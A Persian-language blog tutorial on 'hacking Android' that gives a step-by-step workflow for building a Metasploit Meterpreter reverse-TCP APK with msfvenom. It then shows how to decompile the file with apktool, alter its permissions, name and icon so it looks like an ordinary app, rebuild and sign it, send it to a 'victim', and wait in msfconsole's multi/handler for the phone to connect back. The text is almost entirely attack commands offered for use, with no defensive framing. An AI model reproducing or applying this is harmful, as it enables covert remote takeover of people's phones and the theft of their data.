هک اندروید و چگونگی تغییر آیکون و نام فایل مخرب

برای هک اندروید باید در اولین مرحله دستور زیر را در متاسپلویت اجرا کنیم تا فایل مخرب ایجاد شود:

msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk

در مرحله بعد ابزار Apktool را با توجه به راهنمای رسمی آن نصب میکنیم.

سپس با استفاده از دستور زیر فایل مخرب ایجاد شده را باز و استخراج میکنیم:

apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder

حالا فایل اندروید شما در پوشه ای که تعیین کردید اکسترکت شده است و فایلها و فولدرهای زیر در دسترس شما قرار دارند:

  • پوشه res
  • پوشه smali
  • پوشه original
  • فایل AndroidManifest.xml
  • فایل apktool.yml

در مرحله بعد باید فایل های مورد نیاز را تغییر دهیم:

فایل AndroidManifest.xml را باز کرده و خطوط زیر را پاک میکنیم:

<uses-permission android:name="android.permission.CALL_PHONE"/>

<uses-permission android:name="android.permission.SEND_SMS"/>

و خط زیر را اضافه میکنیم:

<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

سپس خط زیر را پیدا کنید:

<application android:label="@string/app_name">

و آنرا بصورت زیر تغییر دهید:

<application android:label="@string/app_name" android:icon="@drawable/icon" >

(اگر کدها به درستی نمایش داده نمی شوند، شاید این لینک به شما کمک کند.)

فایل را ذخیره کرده و به مسیر زیر بروید:

res/values

فایل strings.xml را باز کرده و نام پیشفرض اپلیکیشن (MainActivity) را به یک نام دلخواه تغییر دهید.

فایل را ذخیره کنید و به پوشه res برگردید. درون این پوشه سه پوشه با نام های زیر ایجاد کنید:

drawable-ldpi-v4
drawable-mdpi-v4
drawable-hdpi-v4

سه فایل با نام icon.png (حتما فرمت PNG باشد) و در اندازه های (به پیکسل) زیر ایجاد کنید و هر فایل را مطابق زیر درون پوشه مناسب خودش قرار دهید:

  • سایز ۳۶ در ۳۶ برای پوشه ldpi
  • سایز ۴۸ در ۴۸ برای پوشه mdpi
  • سایز ۷۲ در ۷۲ برای پوشه hdpi

برای ساختن آیکون ها می توانید از این لینک استفاده کنید.

حال با استفاده از دستور زیر مجددا فایل APK را ایجاد و کامپایل می کنیم:

apktool b /pathtoyourfolder/folder

فایل APK جدید درون پوشه dist قرار دارد.

در آخرین مرحله باید فایل ایجاد شده را امضا (ساین) کنیم.

فایل جاوای ساین کردن اندروید را دانلود کنید.

دستور زیر را اجرا کنید:

java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk

اکنون می توانید فایل را برای قربانی ارسال کنید و در متاسپپلویت دستورات زیر را اجرا کرده و منتظر اتصال بمانید:

msfconsole

use multi/handler

set payload android/meterpreter/reversetcp

set LPORT (your port)

set LHOST (your host)

exploit

درباره نویسنده

مطالب مرتبط

نظر بدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*